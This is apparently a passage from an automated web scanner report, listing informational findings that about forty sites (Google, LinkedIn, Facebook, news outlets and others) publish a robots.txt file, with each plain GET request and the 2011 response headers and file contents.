26.101. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "58d38-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www165
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.102. http://webcache.googleusercontent.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webcache.googleusercontent.com
Path:	/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webcache.googleusercontent.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:25:09 GMT
Expires: Sun, 04 Sep 2011 01:25:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.103. http://www.bayareasearchengineacademy.org/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bayareasearchengineacademy.org
Path:	/blog/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bayareasearchengineacademy.org

Response

HTTP/1.1 200 OK
Content-Length: 23
Content-Type: text/plain
Content-Location: http://www.bayareasearchengineacademy.org/robots.txt
Last-Modified: Tue, 11 Nov 2008 19:24:51 GMT
Accept-Ranges: bytes
ETag: "fe12e2b3344c91:245"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:25:11 GMT
Connection: close

User-Agent: *
Allow: /

26.104. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:45:20 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.105. http://www.careerbuilder.com/share/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/share/login.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 11:16:02 GMT
Accept-Ranges: bytes
ETag: "94b831e255ccc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR38
Date: Sun, 04 Sep 2011 01:25:12 GMT
Connection: close
Content-Length: 10018

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

26.106. http://www.cars.com/go/crp/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/go/crp/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 19 Jul 2010 20:42:34 GMT
ETag: "9cfb-573-9bb42280"
Accept-Ranges: bytes
Content-Length: 1395
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/plain
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:28 GMT; path=/
Vary: Accept-Encoding, User-Agent

# /robots.txt file for http://www.cars.com

Sitemap: http://www.cars.com/sitemap_index.xml

User-agent: *
Disallow: /cgi-bin
Disallow: /news
Disallow: /privatebeta
Disallow: /searchpreview
Di
...[SNIP]...

26.107. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charlotteobserver.com
Path:	/2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
ETag: "192f210-89-4c3b85d4"
Last-Modified: Mon, 12 Jul 2010 21:15:00 GMT
Content-Type: text/plain
Cache-Control: max-age=167
Date: Sun, 04 Sep 2011 01:00:14 GMT
Content-Length: 137
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.charlotteobserver.com/sitemap.xml
Sitemap: http://www.charlotteobserver.com/news_sitemap.xml

26.108. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.203.35
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.109. http://www.fmglobal.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fmglobal.com
Path:	/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fmglobal.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 25 May 2011 20:03:29 GMT
Accept-Ranges: bytes
ETag: "f8a54d1161bcc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 174
Date: Sun, 04 Sep 2011 01:26:07 GMT
Connection: close

# Show the world
User-agent: *
Disallow: /Login/
Disallow: /Login_files/
Disallow: /js/
Disallow: /code/
Disallow: /documents/
Disallow: /execsum/
Disallow: /redetag/

26.110. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportssouthwest.com
Path:	/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foxsportssouthwest.com

Response

HTTP/1.0 200 OK
Server: nginx/1.0.3
Content-Type: text/plain
Last-Modified: Thu, 14 Jan 2010 23:23:05 GMT
ETag: "12e37cd-e9-47d282b45c840"
Accept-Ranges: bytes
Content-Length: 233
Date: Sun, 04 Sep 2011 01:26:09 GMT
Connection: close

User-agent: MediaPartners-Google
Disallow:

User-agent: Googlebot
Disallow:

User-agent: Googlebot-*
Disallow:

User-agent: Slurp
Disallow:

User-agent: Bing
Disallow:

User-agent: MSNBot
Disal
...[SNIP]...

26.111. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freep.com
Path:	/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freep.com

Response

HTTP/1.0 200 OK
Content-Length: 924
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 17:24:49 GMT
Accept-Ranges: bytes
ETag: "8046922b80acc1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Sun, 04 Sep 2011 01:26:11 GMT
Connection: close

# Robots.txt
# Be nice.
#
Sitemap: http://www.freep.com/sitemap_index.xml
Sitemap: http://www.freep.com/sitemapnews_index.xml
#
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallo
...[SNIP]...

26.112. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 04 Sep 2011 00:41:11 GMT
Expires: Sun, 04 Sep 2011 00:41:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

26.113. http://www.google.com/trends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 01:21:11 GMT
Expires: Sun, 04 Sep 2011 01:21:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.114. http://www.googleadservices.com/pagead/conversion/1031221371/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1031221371/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 00:42:24 GMT
Expires: Sun, 04 Sep 2011 00:42:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.115. http://www.greenbiz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greenbiz.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenbiz.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:34:11 GMT
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 25 May 2011 20:43:55 GMT
ETag: "1e20601-5be-4a41fc35658c0"
Accept-Ranges: bytes
Content-Length: 1470
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 00:34:11 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Age: 3123
X-Cache: HIT from localhost
X-Cache-Lookup: HIT from localhost:80
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
Connection: close

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where
...[SNIP]...

26.116. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.latimes.com
Path:	/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 254
Content-Type: text/plain
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Tue, 28 Jun 2011 20:25:21 GMT
ETag: "fe-4e0a38b1"
Cache-Control: private, max-age=100
Date: Sun, 04 Sep 2011 01:26:16 GMT
Content-Length: 254
Connection: close

User-agent: *
Disallow: /*,email.
Disallow: /search/
Disallow: /about/adops/
Disallow: /about/adops/hp/
Sitemap: http://www.latimes.com/sitemap.xml

User-agent: Googlebot-News
Disallow: /*sns-ap
Disal
...[SNIP]...

26.117. http://www.linkedin.com/countserv/count/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/countserv/count/share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-991542871"
Last-Modified: Wed, 06 Apr 2011 03:23:57 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:45:53 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

26.118. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-781835069"
Last-Modified: Wed, 06 Apr 2011 03:23:38 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 01:26:20 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

26.119. http://www.myspace.com/Modules/PostTo/Pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/Modules/PostTo/Pages/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Server: a13891e7efbd29955c3b9025dcf9d11ed5e033d9b20df65c
X-AspNet-Version: 4.0.30319
X-PoweredBy: Adonis DNA
Date: Sun, 04 Sep 2011 01:26:20 GMT
Connection: keep-alive
Content-Length: 660
X-Vertical: profileidentities

User-agent: *
Disallow: /my/*
Disallow: /about/*
Disallow: /signup/*
Disallow: /webim/*
Disallow: /search/*
Disallow: /AdSandbox.ashx
Disallow: /help/reportabuse?*
Disallow: /signout
Disallow
...[SNIP]...

26.120. http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nbcudigitaladops.com
Path:	/hosted/util/setRemoteDomainCookies.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbcudigitaladops.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 30 Mar 2009 14:13:51 GMT
ETag: "a2698d-23-46656b114e5c0"
Accept-Ranges: bytes
Content-Length: 35
Cache-Control: max-age=300
Expires: Sun, 04 Sep 2011 00:55:25 GMT
Content-Type: text/plain
Date: Sun, 04 Sep 2011 00:50:25 GMT
Connection: close
Set-Cookie: pers_cookie_insert_nbc_blogs_80=2227425856.20480.0000; expires=Sun, 04-Sep-2011 04:50:25 GMT; path=/

User-agent: *
Disallow: /pixelman/

26.121. http://www.newslibrary.com/nlsearch.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newslibrary.com
Path:	/nlsearch.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newslibrary.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:25 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
WWW-Authenticate: Basic realm="NewsLibrary"
Last-Modified: Mon, 08 Dec 2008 15:21:15 GMT
ETag: "9de3-6c-493d3b6b"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /

Crawl-delay: 5

Disallow: /cgi-bin/

26.122. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:42:13 GMT
Content-Length: 213
Age: 149
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
Disallow: /beta
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl

...[SNIP]...

26.123. http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 12 Jul 2010 21:19:37 GMT
ETag: "13e0dcb-3bb-4c3b86e9"
Server: Apache/1.3.41
Content-Type: text/plain
Cache-Control: max-age=371
Date: Sun, 04 Sep 2011 00:57:45 GMT
Content-Length: 955
Connection: close

# update log
# 2009-08-26 - kparker @ MI 727-7946968 added, then removed 1198 and newhomes.
# 209-01-29 - pbuckley @ MI added sitemap2 and sitemap3
# 2008-07-23 - pbuckley @ MI
# 2007/03/05 - rwm

Us
...[SNIP]...

26.124. http://www.sologig.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sologig.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sologig.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 11:16:02 GMT
Accept-Ranges: bytes
ETag: "94b831e255ccc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL47
Date: Sun, 04 Sep 2011 01:27:39 GMT
Connection: close
Content-Length: 10018

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...

26.125. http://www.sprint.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:31 GMT
Server: Apache/2.2.14 (Red Hat)
Last-Modified: Tue, 29 Jun 2010 17:26:58 GMT
ETag: "4f0535-7f-48a2e8b5b7c80"
Accept-Ranges: bytes
Content-Length: 127
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /localbusiness/
# Prevent duplicate localbusiness content from being indexed
Disallow: /index_c.html

26.126. https://www.sprint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.net

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:52 GMT
Server: Apache/2.2.4 (Unix)
Last-Modified: Tue, 11 Dec 2007 15:43:44 GMT
ETag: "bc18-1d-93e86c00"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ip/

26.127. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:11 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Sun, 04 Sep 2011 01:27:59 GMT
Age: 58
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

26.128. http://www.thatsracin.com/reg-bin/int.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thatsracin.com
Path:	/reg-bin/int.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thatsracin.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 23 May 2011 20:15:25 GMT
ETag: "1f1e016-7b-4ddac05d"
Server: Apache/1.3.41
Content-Type: text/plain
Cache-Control: max-age=552
Date: Sun, 04 Sep 2011 01:28:02 GMT
Content-Length: 123
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.thatsracin.com/sitemap.xml
Sitemap: http://www.thatsracin.com/news_sitemap.xml

26.129. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.traffic.com
Path:	/Charlotte-Traffic/Charlotte-Traffic-Map.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.traffic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Content-Language: en-US
Content-Length: 25
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1

User-agent: *
Disallow:

26.130. http://www.tsn.ca/ncaa/story/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tsn.ca
Path:	/ncaa/story/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tsn.ca

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: text/plain
Last-Modified: Mon, 29 Jun 2009 16:47:28 GMT
Accept-Ranges: bytes
ETag: "e6816c49d9f8c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:28 GMT
Connection: close
Content-Length: 27

User-Agent: *
Allow: /

26.131. http://www.tulsaworld.com/site/articlepath.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tulsaworld.com
Path:	/site/articlepath.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tulsaworld.com

Response

HTTP/1.1 200 OK
Content-Length: 87
Content-Type: text/plain
Last-Modified: Wed, 20 Apr 2011 20:43:15 GMT
Accept-Ranges: bytes
ETag: "3f6863929bffcb1:277"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:24 GMT
Connection: close

#
# /robots.txt
#

User-agent: *
Disallow: /images
Disallow: /articleimages

26.132. http://www.tumblr.com/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tumblr.com
Path:	/share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tumblr.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:30 GMT
Server: Apache
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Cache-Control: public
Last-Modified: Fri, 15 Apr 2011 22:13:30 GMT
ETag: e41af6952088ad3ee1554a19625af35b
Expires: Mon, 05 Sep 2011 01:28:30 GMT
Pragma:
Vary: Accept-Encoding
X-Tumblr-Usec: D=22076
Content-Length: 74
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /radar
Disallow: /audio_file
Disallow: /dashboard

26.133. http://www.usatoday.com/community/profile.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/community/profile.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT
Accept-Ranges: bytes
ETag: "0fbccbb165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:33 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

26.134. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wisdomtree.com
Path:	/bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wisdomtree.com

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 19:39:36 GMT
Accept-Ranges: bytes
ETag: "404ea78bdcb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:25 GMT
Connection: close

User-agent: *
Disallow: /_Archive/
Disallow: /admin/
Disallow: /css/
Disallow: /scripts/

26.135. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Sat, 18 Jun 2011 19:12:34 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...

26.136. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:28:37 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

26.137. http://www.zvents.com/images/internal/5/6/5/2/img_13432565_thumb.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/images/internal/5/6/5/2/img_13432565_thumb.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 04 Sep 2011 01:00:47 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 4
ETag: "8b580e35dacd6e1e6a353511cb096412"
Cache-Control: must-revalidate, private, max-age=0
Content-Length: 569
